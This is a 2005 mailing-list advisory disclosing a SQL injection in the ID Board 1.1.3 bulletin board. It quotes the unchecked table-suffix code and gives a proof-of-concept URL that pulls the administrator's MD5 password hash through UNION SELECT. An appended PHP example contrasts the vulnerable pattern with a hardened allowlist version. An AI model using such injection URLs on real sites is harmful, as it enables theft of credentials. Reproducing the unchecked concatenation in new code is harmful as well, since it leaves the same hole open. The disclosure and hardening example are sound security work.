Message-ID: <A58DC6DA-0A03-4531-8040-F0C0299B7332@systemli.org>
Date: Sun Jul 10 10:47:34 2005
From: defa at systemli.org (Defa)
Subject: ID Board 1.1.3 SQL Injection Vulnerability

============================================================
Title: ID Board 1.1.3 SQL Injection Vulnerability
Vulnerability Discovery: me, myself and I
Date: 09/07/2005
Severity: Remote users can fetch MD5 Passwd Hash.
Affected version: 1.1.3 free (only one tested)
Vendor: http://www.id-team.com/
============================================================

============================================================

* Summary *

ID Board is a little Bulletin Board system. It is offered in three
versions, I could only test the free one. Board is commonly used on
German-speaking websites.

-------------------------------------------------------------

* Problem Description *
-----------------------

The bug resides in sql.cls.php - the tbl_suff variable isn't checked.

Vulnerable Code:

    if (!ereg("LEFT JOIN", $from) && !ereg(",", $from) && !ereg("AS", $from))
        $from = "[tbl_prev]".$from."[tbl_suff]";

* Example * (Account required)
------------------------------

http://support.id-team.com/index.php?site=warn&f=1%20WHERE%200=1%
20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%
20WHERE%20mem_id=1/*&0&warn=0

-------------------------------------------------------------

* Fix *

Contact the Vendor.

-------------------------------------------------------------

* References *

This mail.

-------------------------------------------------------------

* Credits *

no credit.

-------------------------------------------------------------

regards
defa

--
Don't eat yellow snow!
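
Added example (not part of the original post and not ID Board code): the shape of the quoted check next to a hardened way to build the FROM clause, with the table name checked against an allowlist and the prefix and suffix restricted to identifier characters. The table names, the idb_ prefix and the function names are assumptions, and ereg() is replaced by strpos() because PHP 7 and later no longer provide ereg().

```php
<?php
// Added example, not ID Board code. Names and values below are hypothetical.
const ALLOWED_TABLES = ['members', 'posts', 'topics'];

// Shape of the check quoted in the advisory, with ereg() swapped for strpos():
// any value without "LEFT JOIN", "," or "AS" is wrapped and used unchanged.
function from_clause_original(string $from, string $prefix, string $suffix): string
{
    if (strpos($from, 'LEFT JOIN') === false
        && strpos($from, ',') === false
        && strpos($from, 'AS') === false) {
        $from = $prefix . $from . $suffix;
    }
    return $from;
}

// Identifiers cannot be bound as query parameters, so every part of the
// table name is validated before it is concatenated into SQL.
function from_clause_hardened(string $table, string $prefix, string $suffix): string
{
    foreach ([$prefix, $suffix] as $part) {
        if (!preg_match('/\A[A-Za-z0-9_]*\z/', $part)) {
            throw new InvalidArgumentException('bad table prefix/suffix');
        }
    }
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('unknown table');
    }
    return '`' . $prefix . $table . $suffix . '`';
}

// Constructed inputs: a plain table name and a value carrying extra SQL text.
foreach (['members', 'members WHERE 1=1 /*'] as $input) {
    echo 'original: FROM ', from_clause_original($input, 'idb_', ''), "\n";
    try {
        echo 'hardened: FROM ', from_clause_hardened($input, 'idb_', ''), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'hardened: rejected (', $e->getMessage(), ")\n";
    }
}
```

The original-shape function passes the second input through into the FROM clause, while the hardened one rejects it before any SQL is built.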